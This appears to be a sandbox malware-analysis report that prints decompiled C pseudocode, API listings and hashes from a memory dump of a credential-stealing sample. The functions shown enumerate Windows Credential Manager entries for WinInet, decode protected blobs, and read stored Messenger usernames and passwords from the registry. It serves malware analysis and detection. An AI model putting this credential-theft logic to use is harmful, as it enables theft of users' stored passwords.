		_v36 = _t159;
		 *_t125 =  *0x415590;
		L00412066();
		asm("fdivr qword [esp+0x30]");
		asm("fistp qword [esp+0x30]");
		_t122 = _v28;
		if(_v20 != _t104) {
			free(_v20);
		}
		_t81 = _t122;
	}
	return _t81;
}
                                                                                                                                                                        0x00401bb5
                                                                                                                                                                        0x00401bb6
                                                                                                                                                                        0x00401bb8
                                                                                                                                                                        0x00401bb8
                                                                                                                                                                        0x00401bc0
                                                                                                                                                                        0x00401bc2
                                                                                                                                                                        0x00401bc2
                                                                                                                                                                        0x00401bca
                                                                                                                                                                        0x00401bcc
                                                                                                                                                                        0x00401bcc
                                                                                                                                                                        0x00401bd5
                                                                                                                                                                        0x00401bd7
                                                                                                                                                                        0x00401bd7
                                                                                                                                                                        0x00401be0
                                                                                                                                                                        0x00401be2
                                                                                                                                                                        0x00401be2
                                                                                                                                                                        0x00401beb
                                                                                                                                                                        0x00401bed
                                                                                                                                                                        0x00401bed
                                                                                                                                                                        0x00401bf6
                                                                                                                                                                        0x00401c42
                                                                                                                                                                        0x00401c48
                                                                                                                                                                        0x00401c4d
                                                                                                                                                                        0x00401c4e
                                                                                                                                                                        0x00401bf8
                                                                                                                                                                        0x00401bf8
                                                                                                                                                                        0x00401bfc
                                                                                                                                                                        0x00401bfd
                                                                                                                                                                        0x00401bfe
                                                                                                                                                                        0x00401c01
                                                                                                                                                                        0x00401c06
                                                                                                                                                                        0x00401c10
                                                                                                                                                                        0x00401c13
                                                                                                                                                                        0x00401c1c
                                                                                                                                                                        0x00401c26
                                                                                                                                                                        0x00401c2a
                                                                                                                                                                        0x00401c2e
                                                                                                                                                                        0x00401c34
                                                                                                                                                                        0x00401c39
                                                                                                                                                                        0x00401c3a
                                                                                                                                                                        0x00401c3a
                                                                                                                                                                        0x00401c55

Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Similarity
• API ID: free$strlen
• String ID:
• API String ID: 667451143-3916222277
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
			E004077C5(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404651( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x418968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x418968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046E1( &_v532);
									if(E004047AA( &_v532, _t152) != 0 && E0040481B(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4135f4;
										_t110 = wcschr(_t109, 0x3a);
                                                                                                                                                                        										_t143 = _t144 + 0x14;
                                                                                                                                                                        										if(_t110 != 0) {
                                                                                                                                                                        											 *_t110 = 0;
                                                                                                                                                                        											_v1136 =  &(_t110[0]);
                                                                                                                                                                        										}
                                                                                                                                                                        										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
                                                                                                                                                                        										LocalFree(_v1168);
                                                                                                                                                                        									}
                                                                                                                                                                        									E004047FB( &_v532);
                                                                                                                                                                        								}
                                                                                                                                                                        								_v1188 = _v1188 + 1;
                                                                                                                                                                        								if(_v1188 < _v1180) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						L18:
                                                                                                                                                                        						_v1096(_v1184);
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return E004046CC( &_v1108);
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,73AFF420), ref: 0040465E
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
                                                                                                                                                                          • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040782F
                                                                                                                                                                        • wcsncmp.MSVCRT(?,?,?), ref: 00407873
                                                                                                                                                                        • memset.MSVCRT ref: 00407907
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040792B
                                                                                                                                                                        • wcschr.MSVCRT ref: 0040797F
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004079A9
                                                                                                                                                                          • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                        • String ID: J$Microsoft_WinInet
                                                                                                                                                                        • API String ID: 2413121283-260894208
                                                                                                                                                                        • Opcode ID: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                        • Instruction ID: 0e9b9eaeb9102773f5efe30ff018f7355b1463afce593653dd7f5536c2c1a2ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 529401139110fed122d62a817e927cb3e1e20bce95576607e3b03d187f40e0ba
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E51E3B1A083469FD710DF65C880A9BB7E8BF89304F00492EF999D3250E778E955CB97
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040DB04(char* __ebx, void** _a4) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				int _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				char* _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				char _v556;
                                                                                                                                                                        				char _v557;
                                                                                                                                                                        				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				// Read the stored "Password.NET Messenger Service" value into a 0x400-byte stack buffer.
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				// First byte >= 0x20: value is stored as plain text, no decoding step needed.
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E0040132A( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						// Read the matching "User.NET Messenger Service" value; success marks the pair as recovered.
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				// Otherwise the value is a protected blob: the subcalls resolve an API via
				// LoadLibraryA/GetProcAddress (see APIs below) and decode it into the same buffer.
				_t69 =  &_v556;
				E004046E1( &_v556);
				if(E004047AA(_t69, _t74) == 0) {
					L8:
					E004047FB( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E0040481B(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}
Instruction addresses associated with the listing above (0x00000000 where no address applies): 0x0040db04, 0x0040db1d, 0x0040db2d, 0x0040db30, 0x0040db33, 0x0040db3b, 0x0040dc25, 0x0040dc2a, 0x0040dc36, 0x0040dc36, 0x0040db41, 0x0040db45, 0x00000000, 0x00000000, 0x0040db4b, 0x0040db52, 0x0040db55, 0x0040dbcb, 0x0040dbce, 0x0040dbd1, 0x0040dbe5, 0x0040dbec, 0x0040dc05, 0x0040dc08, 0x0040dc10, 0x0040dc12, 0x0040dc18, 0x0040dc1e, 0x0040dc1e, 0x0040dc10, 0x00000000, 0x0040dbd1, 0x0040db57, 0x0040db5d, 0x0040db69, 0x0040dbbc, 0x0040dbc2, 0x0040dbc7, 0x00000000, 0x0040dbc7, 0x0040db71, 0x0040db7a, 0x0040db90, 0x00000000, 0x00000000, 0x0040db95, 0x0040dba4, 0x0040dbac, 0x0040dbac, 0x0040dbb6, 0x00000000

APIs
• RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,73AFF420), ref: 0040DB33
• RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040DC08
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• memcpy.MSVCRT ref: 0040DBA4
• LocalFree.KERNEL32(?,?,00000000,?), ref: 0040DBB6
• RegCloseKey.ADVAPI32(?), ref: 0040DC2A
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
• String ID: $Password.NET Messenger Service$User.NET Messenger Service
• API String ID: 3289975857-105384665
• Opcode ID: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
• Instruction ID: 0f5ec9c9176e8b350c57746001926e44edf78976103d06fec131b918f38f0bed
• Opcode Fuzzy Hash: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
• Instruction Fuzzy Hash: 02315871D01219AFCB21DFA1CC44BDEBBB8AF49314F1040B6E505B7290D6789B88DB98
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 68%
			E00405E50(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100; // FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM
				// Error codes 2100..2999 are LAN Manager (NERR_*) codes whose text lives in netmsg.dll.
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) { // constant-false as decompiled; presumably meant to test _t8
						_t14 = 0x1900; // adds FORMAT_MESSAGE_FROM_HMODULE
					}
				}
				// Copy the system message text into the caller's buffer (limit 0x400 bytes), else a fixed string.
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}
Instruction addresses associated with the listing above: 0x00405e50, 0x00405e56, 0x00405e5e, 0x00405e66, 0x00405e6b, 0x00405e75, 0x00405e7d, 0x00405e7f, 0x00405e7f, 0x00405e7d, 0x00405e9b, 0x00405eca, 0x00405e9d, 0x00405ea8, 0x00405eb0, 0x00405eb6, 0x00405eba, 0x00405eba, 0x00405ed4

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F6F,?,?), ref: 00405E75
                                                                                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F6F,?,?), ref: 00405E93
                                                                                                                                                                        • strlen.MSVCRT ref: 00405EA0
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,00405F6F,?,?), ref: 00405EB0
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00405F6F,?,?), ref: 00405EBA
                                                                                                                                                                        • strcpy.MSVCRT(?,Unknown Error,?,?,00405F6F,?,?), ref: 00405ECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                        • API String ID: 3198317522-572158859
                                                                                                                                                                        • Opcode ID: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                        • Instruction ID: ee7e3b4bfe4f381a5a8dca6b6b4a58a66687d49b648cda9812902ba604a22f70
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                        • Instruction Fuzzy Hash: DC01D432604214BEEB245B61DC46EDF7E68EB09796B20403AF602B41D0DA759F40DADC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                        			E0040831F(void* __eflags, char* _a4) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t3;
                                                                                                                                                                        				int _t6;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 = E00406155(_a4);
                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                        					strcpy(0x4181b8, _a4);
                                                                                                                                                                        					strcpy(0x4182c0, "general");
                                                                                                                                                                        					_t6 = GetPrivateProfileIntA(0x4182c0, "rtl", 0, 0x4181b8);
                                                                                                                                                                        					asm("sbb eax, eax");
                                                                                                                                                                        					 *0x418304 =  ~(_t6 - 1) + 1;
                                                                                                                                                                        					E00407F2B(0x418308, "charset", 0x3f);
                                                                                                                                                                        					E00407F2B(0x418348, "TranslatorName", 0x3f);
                                                                                                                                                                        					return E00407F2B(0x418388, "TranslatorURL", 0xff);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t3;
                                                                                                                                                                        			}

Basic block addresses (control-flow graph): 0x00408323, 0x0040832b, 0x00408339, 0x00408349, 0x0040835a, 0x00408363, 0x00408372, 0x00408377, 0x00408388, 0x00000000, 0x004083a5, 0x004083a6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                        • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408339
                                                                                                                                                                        • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408349
                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 0040835A
                                                                                                                                                                          • Part of subcall function 00407F2B: GetPrivateProfileStringA.KERNEL32(004182C0,?,0041344F,00418308,?,004181B8), ref: 00407F46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                        • API String ID: 185930432-2039793938
                                                                                                                                                                        • Opcode ID: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                                                                                                                                                                        • Instruction ID: 927989a77509199662194d441518c64dc34f1856eccff2a3d84bf87df20cc289
                                                                                                                                                                        • Opcode Fuzzy Hash: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 00F0C232EC421539C62036615C07FEA3A148BE2F10F08447FBD04B61C2EA7D49D1815E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E004088C6(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                        				intOrPtr _t114;
                                                                                                                                                                        				signed int _t117;
                                                                                                                                                                        				signed int _t119;
                                                                                                                                                                        				signed short _t121;
                                                                                                                                                                        				signed int _t122;
                                                                                                                                                                        				signed int _t152;
                                                                                                                                                                        				signed int _t156;
                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                        				signed int _t161;
                                                                                                                                                                        				signed int _t163;
                                                                                                                                                                        				signed int _t168;
                                                                                                                                                                        				signed int _t169;
                                                                                                                                                                        				signed int _t170;
                                                                                                                                                                        				void* _t172;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				void* _t174;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				intOrPtr _t180;
                                                                                                                                                                        
                                                                                                                                                                        				_t174 = __eflags;
                                                                                                                                                                        				_t172 = __eax;
                                                                                                                                                                        				E004086DC(__eax);
                                                                                                                                                                        				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                                                                                                                                                        				_t122 = 0xd;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                                                                                                                                                        				_t156 = 0x14;
                                                                                                                                                                        				_t96 = _t122 * _t156;
                                                                                                                                                                        				 *(_t172 + 0x1b0) = _t122;
                                                                                                                                                                        				_push( ~(0 | _t174 > 0x00000000) | _t96);
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				 *(_t172 + 0x1b4) = _t96;
                                                                                                                                                                        				_t158 = 0x10;
                                                                                                                                                                        				_t98 = _t122 * _t158;
                                                                                                                                                                        				_push( ~(0 | _t174 > 0x00000000) | _t98);
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				 *(_t172 + 0x34) = _t98;
                                                                                                                                                                        				_v8 = 0x4178e0;
                                                                                                                                                                        				do {
                                                                                                                                                                        					_t21 =  &_v8; // 0x4178e0
                                                                                                                                                                        					_t99 =  *_t21;
                                                                                                                                                                        					_t168 =  *_t99;
                                                                                                                                                                        					_v12 = _t168;
                                                                                                                                                                        					_t169 = _t168 * 0x14;
                                                                                                                                                                        					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                                                                                                                                                        					_t24 =  &_v8; // 0x4178e0
                                                                                                                                                                        					_t104 = _v12 << 4;
                                                                                                                                                                        					_v12 = _t104;
                                                                                                                                                                        					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
                                                                                                                                                                        					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                                                                                                                                                        					_t173 = _t173 + 0x18;
                                                                                                                                                                        					_v16 = _t107;
                                                                                                                                                                        					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                                                                                                                                                        					if((_t107 & 0xffff0000) == 0) {
                                                                                                                                                                        						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E00407A69(_t107 & 0x0000ffff);
                                                                                                                                                                        						_t121 = E00407A69(_v16 | 0x00010000);
                                                                                                                                                                        						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                                                                                                                                                        						_t122 = 0xd;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = _v8 + 0x24;
                                                                                                                                                                        					_t178 = _v8 - 0x417ab4;
                                                                                                                                                                        				} while (_t178 < 0);
                                                                                                                                                                        				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                                                                                                                                                        				_t161 = 4;
                                                                                                                                                                        				_t110 = _t122 * _t161;
                                                                                                                                                                        				 *(_t172 + 0x20) = _t122;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                                                                                                                                                        				_push( ~(0 | _t178 > 0x00000000) | _t110);
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                        				 *(_t172 + 0x24) = _t110;
                                                                                                                                                                        				L00412090();
                                                                                                                                                                        				_t170 = _t110;
                                                                                                                                                                        				if(_t170 == 0) {
                                                                                                                                                                        					_t170 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                                                                                                                                                        					_t180 = _t114;
                                                                                                                                                                        					_a8 = _t114;
                                                                                                                                                                        					if(_t180 == 0) {
                                                                                                                                                                        						_a8 = 0x64;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                                                                                                                                                        					_t163 = 4;
                                                                                                                                                                        					_t117 = _t122 * _t163;
                                                                                                                                                                        					 *(_t170 + 4) = _t122;
                                                                                                                                                                        					_push( ~(0 | _t180 > 0x00000000) | _t117);
                                                                                                                                                                        					L00412090();
                                                                                                                                                                        					_a4 = _a4 & 0x00000000;
                                                                                                                                                                        					 *_t170 = _t117;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t152 = _a4;
                                                                                                                                                                        						_t119 = _t152 << 2;
                                                                                                                                                                        						_a4 = _a4 + 1;
                                                                                                                                                                        						 *( *_t170 + _t119 + 2) = _t152;
                                                                                                                                                                        						 *((short*)(_t119 +  *_t170)) = _a8;
                                                                                                                                                                        					} while (_a4 < _t122);
                                                                                                                                                                        				}
                                                                                                                                                                        				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                                                                                                                                                        				 *(_t172 + 0x1a0) = _t170;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                                                                                                                                                        				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                                                                                                                                                        				return E00408846(_t172);
                                                                                                                                                                        			}
                                                                                                                                                                        0x004088c6
                                                                                                                                                                        0x004088cf
                                                                                                                                                                        0x004088d1
                                                                                                                                                                        0x004088d9
                                                                                                                                                                        0x004088df
                                                                                                                                                                        0x004088e0
                                                                                                                                                                        0x004088ea
                                                                                                                                                                        0x004088ed
                                                                                                                                                                        0x004088f2
                                                                                                                                                                        0x004088fc
                                                                                                                                                                        0x004088fd
                                                                                                                                                                        0x00408902
                                                                                                                                                                        0x0040890c
                                                                                                                                                                        0x0040890f
                                                                                                                                                                        0x00408918
                                                                                                                                                                        0x00408919
                                                                                                                                                                        0x00408920
                                                                                                                                                                        0x00408923
                                                                                                                                                                        0x0040892a
                                                                                                                                                                        0x0040892a
                                                                                                                                                                        0x0040892a
                                                                                                                                                                        0x0040892d
                                                                                                                                                                        0x0040892f
                                                                                                                                                                        0x00408932
                                                                                                                                                                        0x00408941
                                                                                                                                                                        0x00408946
                                                                                                                                                                        0x00408955
                                                                                                                                                                        0x0040895b
                                                                                                                                                                        0x0040895e
                                                                                                                                                                        0x00408969
                                                                                                                                                                        0x00408973
                                                                                                                                                                        0x0040897b
                                                                                                                                                                        0x0040897e
                                                                                                                                                                        0x00408982
                                                                                                                                                                        0x0040899b
                                                                                                                                                                        0x0040899f
                                                                                                                                                                        0x004089ac
                                                                                                                                                                        0x004089b0
                                                                                                                                                                        0x004089b0
                                                                                                                                                                        0x004089b1
                                                                                                                                                                        0x004089b5
                                                                                                                                                                        0x004089b5
                                                                                                                                                                        0x004089c5
                                                                                                                                                                        0x004089c9
                                                                                                                                                                        0x004089d0
                                                                                                                                                                        0x004089d3
                                                                                                                                                                        0x004089d8
                                                                                                                                                                        0x004089db
                                                                                                                                                                        0x004089e6
                                                                                                                                                                        0x004089e7
                                                                                                                                                                        0x004089ec
                                                                                                                                                                        0x004089ee
                                                                                                                                                                        0x004089f1
                                                                                                                                                                        0x004089f6
                                                                                                                                                                        0x004089fc
                                                                                                                                                                        0x00408a58
                                                                                                                                                                        0x00408a58
                                                                                                                                                                        0x004089fe
                                                                                                                                                                        0x004089fe
                                                                                                                                                                        0x00408a01
                                                                                                                                                                        0x00408a03
                                                                                                                                                                        0x00408a06
                                                                                                                                                                        0x00408a08
                                                                                                                                                                        0x00408a08
                                                                                                                                                                        0x00408a12
                                                                                                                                                                        0x00408a19
                                                                                                                                                                        0x00408a1c
                                                                                                                                                                        0x00408a21
                                                                                                                                                                        0x00408a28
                                                                                                                                                                        0x00408a29
                                                                                                                                                                        0x00408a2e
                                                                                                                                                                        0x00408a33
                                                                                                                                                                        0x00408a35
                                                                                                                                                                        0x00408a35
                                                                                                                                                                        0x00408a3c
                                                                                                                                                                        0x00408a3f
                                                                                                                                                                        0x00408a45
                                                                                                                                                                        0x00408a50
